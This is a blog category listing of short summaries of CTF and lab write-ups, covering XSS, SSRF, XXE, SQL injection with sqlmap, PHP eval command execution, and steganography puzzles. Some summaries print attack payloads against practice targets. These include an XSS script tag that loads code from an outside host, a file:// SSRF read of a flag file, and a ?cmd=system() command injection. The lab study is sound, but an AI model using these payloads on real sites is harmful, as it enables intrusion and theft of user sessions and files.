文章分类 -  CyberSpace Security

上一页 1 ··· 5 6 7 8 9 10 11 下一页
摘要:很好的一道题目 整体思路没问题 只是没反应到用 filter查看 useless.php(...) 分析源码: ![image](https://img2023.cnblogs.com/blog/3092507/202309/3092507-20230901203808728-284090353.p 阅读全文
posted @ 2023-09-01 20:46 N0zoM1z0
摘要:命令: ``` $ cd /mnt/ ``` 就能看到 c d 盘了 进入对应目录即可 阅读全文
posted @ 2023-09-01 19:16 N0zoM1z0
摘要:这题考察的是 用 winhex 更改图片长宽 ![image](https://img2023.cnblogs.com/blog/3092507/202309/3092507-20230901164524994-1708865007.png) 开头第二排两个字母对应的 xx xx 便是长和宽的值 慢 阅读全文
posted @ 2023-09-01 16:46 N0zoM1z0
摘要:主要是第二张GIF格式损坏 对照 第一张GIF的文件头 ![image](https://img2023.cnblogs.com/blog/3092507/202309/3092507-20230901162413633-1214761605.png) 用winhex进行修补后分帧即可查看到flag 阅读全文
posted @ 2023-09-01 16:25 N0zoM1z0
摘要:# eval执行 用法 ?cmd=system("cmd") 这样传入的字符串就会被解析成系统命令 尝试 "ls"发现index.php 进入下级目录没用 #### 构造 "cd ../;ls"尝试多次发现 "cd ../../../;ls"后出现flag ![image](https://img2 阅读全文
posted @ 2023-09-01 15:50 N0zoM1z0
摘要:还是用SQLMap实现(SQLMap太香了!) 命令格式: ``` python3 sqlmap.py -u ... --dbs --tamper "space2comment.py" ``` 然后还是选择 sqli 库 只是这次得到的 column就很离谱了 ![image](https://im 阅读全文
posted @ 2023-09-01 12:02 N0zoM1z0
摘要:这题没有明显可见的可传的GET参数 观察源码: 这个是对于url中的GET参数 如果 参数名字为 jumpto的话就进行跳转 所以我们可以利用 ?jumpto= 来进行 xss注入 由于这题是跳转型 不能直接用 </tEXtArEa>'"><sCRiPt sRC=//uj.ci/idp></sCrI 阅读全文
posted @ 2023-09-01 11:32 N0zoM1z0
摘要:注意这个题要自己加闭合语句 先随便输入观察源码: ![image](https://img2023.cnblogs.com/blog/3092507/202309/3092507-20230901111108273-1671560451.png) 而我们的XSS语句原始是这样的: ``` '"> ` 阅读全文
posted @ 2023-09-01 11:12 N0zoM1z0
摘要:### 内网访问 直接访问 127.0.0.1/flag.php 即可 ### 伪协议读取文件 ``` ?url=file:///var/www/html/flag.php ``` ### 302跳转bypass 所谓的302就是 ?url=... 后面的网址 等价于 ?path=... 访问网站源 阅读全文
posted @ 2023-09-01 10:34 N0zoM1z0
摘要:### 存储型XSS ![image](https://img2023.cnblogs.com/blog/3092507/202308/3092507-20230830093417050-1507050033.png) 在 XSS平台生成一个项目后 将XSS注入语句填入 name 复制该题网址到ur 阅读全文
posted @ 2023-09-01 10:21 N0zoM1z0
摘要:wireshark分析后能找到 flag.rar 相关的流量 同foremost将其分离后 会得到一个 含有flag.txt的zip 但是它不是伪加密。。。 用AAPR四位数爆破得到密码 解压即可得到flag{} 阅读全文
posted @ 2023-09-01 09:02 N0zoM1z0
摘要:结合题目判断是 F5隐写 利用工具 F5-steganography-master 用法 ``` cmd : java Extract 图片路径 ``` 打开 output.txt 可以发现是一个zip文件 里面有 flag.txt 改成 .zip后缀后发现是一个伪加密 直接修改标志位后解压即可得到 阅读全文
posted @ 2023-09-01 08:34 N0zoM1z0
摘要:BUUCTF的Windows靶场不行 Linux好像可以 ## Pass-01 这是采取的前端过滤 #### 1. ![image](https://img2023.cnblogs.com/blog/3092507/202308/3092507-20230831194605736-113189949 阅读全文
posted @ 2023-08-31 21:06 N0zoM1z0
摘要:## Level-1 payload: ``` ?name= ``` ## Level-2 用1的payload查看源代码发现 '/'和'\'都被过滤转义了 放弃 script ``` 这种形式 观察源码发现除了要闭合引号外还要闭合 '>' payload: ``` ?keyword=" >// ` 阅读全文
posted @ 2023-08-31 19:15 N0zoM1z0
摘要:关键在于找到注入点!!! 正常查看无论怎么找都看不到任何有 ``` ?xxx=xxx ``` 的这种注入点 ## KEY! 打开热点新闻 在网络选项卡中查看到 ![image](https://img2023.cnblogs.com/blog/3092507/202308/3092507-20230 阅读全文
posted @ 2023-08-31 16:20 N0zoM1z0
摘要:### CMD-1 以 ?cmd= 的 GET方式传递 ``` ?cmd=whoami ``` 得到 ![image](https://img2023.cnblogs.com/blog/3092507/202308/3092507-20230831153910523-33466741.png) ## 阅读全文
posted @ 2023-08-31 16:08 N0zoM1z0
摘要:观察challenge.php可知我们要通过访问本地 来获取flag.php 文件 源码就是一堆过滤 + curl命令执行 直接构造 ``` ?url=http://127.0.0.1/flag.php ``` 或 ``` ?url=http://localhost.flag.php ``` 即可获 阅读全文
posted @ 2023-08-31 11:46 N0zoM1z0
摘要:XXE漏洞: 再 XML语句中利用 ENTITY 的方式 来使解析器执行系统命令 诸如 file:// php://filter/ 来获取信息 打开靶机 发现是一个登陆提交页面 随便输入后 burpsuite抓包: ![image](https://img2023.cnblogs.com/blog/ 阅读全文
posted @ 2023-08-31 10:31 N0zoM1z0
摘要:打开后是一张图片 用 winhex查看后 发现是隐藏的zip文件 改后缀后解压发现是zip伪加密 找到对应标志位修改后解压得到一张图片和一个zip 这个zip是真加密 如果强行按 伪加密的方法解密的话文件会损坏 用steghide 提取图片 得到zip的解压密码 ``` 将图片和steghide放在 阅读全文
posted @ 2023-08-31 09:47 N0zoM1z0
摘要:一张图片 winhex查看没什么思路 换 stegsolve隐写查看 ![image](https://img2023.cnblogs.com/blog/3092507/202308/3092507-20230830202323859-529255099.png) 发现开头是 PK!!! 说明是一个 阅读全文
posted @ 2023-08-30 20:25 N0zoM1z0

上一页 1 ··· 5 6 7 8 9 10 11 下一页